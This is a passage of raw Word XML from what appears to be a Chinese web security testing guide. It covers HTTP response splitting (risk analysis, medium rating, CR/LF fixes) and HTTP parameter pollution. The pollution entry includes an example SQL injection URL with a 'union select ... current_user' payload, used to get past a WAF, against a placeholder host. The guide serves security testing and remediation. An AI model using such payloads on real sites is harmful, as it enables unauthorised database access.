      </w:pPr>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对上述的</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，浏览器会自动匹配之前收到的第二个响应</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>HTTP/1.1 200</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击者利用此漏洞可控制第二条响应的内容，</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>从而达到欺骗用户的目的</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA9C6C" w14:textId="0D729806" w:rsidR="00A944EF" w:rsidRPr="007860EA" w:rsidRDefault="00C24790" w:rsidP="007860EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00A944EF" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头拆分攻击本质是：攻击者可以发送一个或几个</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令使服务器产生攻击者想得到的输出。攻击者构造的</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令使服务器误把几条</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求看成一条完整的</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求来解释。如果攻击者可以控制第一条请求的部分内容，而且完全控制着第二条及后面的</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，即从</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态行一直到</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求的尾部，攻击者会发送多个</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求指令到目标系统，例如第一条请求指令使得服务器完全接受两个</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00E753A4" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，第二条请求通常是在服务器上请求一些非法资源，而服务器将会自动匹配到第二条请求的响应，并输出攻击者想要请求的资源，从而达到攻击目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FA32B" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF36A7C" w14:textId="4E0278CD" w:rsidR="00A944EF" w:rsidRPr="007860EA" w:rsidRDefault="00D41EFA" w:rsidP="007860EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可成功实现</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会话固定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48E3ED" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172EAFF2" w14:textId="7ED6D410" w:rsidR="0052625B" w:rsidRPr="007860EA" w:rsidRDefault="0052625B" w:rsidP="007860EA">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制用户输入的</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符正确编码后再输出，以防止攻击者注入自定义的</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75209A92" w14:textId="129261ED" w:rsidR="0052625B" w:rsidRDefault="0052625B" w:rsidP="007860EA">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制输入</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的长度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1E277" w14:textId="7D61CD4F" w:rsidR="00EF7E10" w:rsidRPr="007860EA" w:rsidRDefault="00EF7E10" w:rsidP="00EF7E10">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65CBC82" w14:textId="77777777" w:rsidR="00A944EF" w:rsidRPr="00F757E4" w:rsidRDefault="00A944EF" w:rsidP="00106665">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB8B705" w14:textId="4F1ABF3A" w:rsidR="00A944EF" w:rsidRPr="00F757E4" w:rsidRDefault="00CA6BAF" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc498434555"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数污染</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="1AFAC230" w14:textId="0986493E" w:rsidR="00A944EF" w:rsidRPr="00F24A91" w:rsidRDefault="00A944EF" w:rsidP="00F24A91">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00542ECC" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用同名参数对原参数进行污染</w:t>
      </w:r>
      <w:r w:rsidR="00C50168" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，应用在检测时只检测第一个参数是否符号要求，因此可</w:t>
      </w:r>
      <w:r w:rsidR="00C41040" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用同名参数构造攻击脚本</w:t>
      </w:r>
      <w:r w:rsidR="00C50168" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，参数污染</w:t>
      </w:r>
      <w:r w:rsidR="00C41040" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常用于</w:t>
      </w:r>
      <w:r w:rsidR="00C41040" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="00C41040" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入绕过</w:t>
      </w:r>
      <w:r w:rsidR="00C41040" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidR="00C41040" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7942F83D" w14:textId="14BF3A34" w:rsidR="0009193D" w:rsidRPr="00F24A91" w:rsidRDefault="00A944EF" w:rsidP="00F24A91">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00C41040" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在请求中添加同名参数，并在添加的参数中输入恶意构造的语句</w:t>
      </w:r>
      <w:r w:rsidR="00C50168" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="0009193D" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r w:rsidR="00B24D0B" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://www.xx.com/index.php</w:t>
      </w:r>
      <w:r w:rsidR="00B24D0B" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>?id=1&amp;id=2%20union%20select%201,2,3,current_user</w:t>
      </w:r>
      <w:r w:rsidR="00B24D0B" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，利用该漏洞进行</w:t>
      </w:r>
      <w:r w:rsidR="00B24D0B" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="00B24D0B" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入绕过可参考</w:t>
      </w:r>
      <w:r w:rsidR="00B24D0B" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>80sec</w:t>
      </w:r>
      <w:r w:rsidR="00B24D0B" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布的《浅谈绕过</w:t>
      </w:r>
      <w:r w:rsidR="00B24D0B" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>waf</w:t>
      </w:r>
      <w:r w:rsidR="00B24D0B" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数种方法》。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD526D7" w14:textId="77777777" w:rsidR="00A117EE" w:rsidRPr="00F24A91" w:rsidRDefault="00C24790" w:rsidP="00F24A91">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00A944EF" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A117EE" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同</w:t>
      </w:r>
      <w:r w:rsidR="00A117EE" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00A117EE" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器对同名参数的处理方式如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3FD54E" w14:textId="77777777" w:rsidR="00A117EE" w:rsidRPr="00F24A91" w:rsidRDefault="00A117EE" w:rsidP="00F24A91">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BD04F68" wp14:editId="11832E89">
            <wp:extent cx="5257800" cy="1368152"/>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4">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="8494" b="10810"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5257800" cy="1368152"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D803C" w14:textId="709D0ADE" w:rsidR="00A944EF" w:rsidRPr="00F24A91" w:rsidRDefault="00A117EE" w:rsidP="00F24A91">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可根据其特性对参数进行覆盖，绕过应用检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D6D24" w14:textId="77777777" w:rsidR="00A944EF" w:rsidRPr="00F24A91" w:rsidRDefault="00A944EF" w:rsidP="00F24A91">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0690D4C6" w14:textId="011244AE" w:rsidR="00A944EF" w:rsidRPr="00F24A91" w:rsidRDefault="00B15369" w:rsidP="00F24A91">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
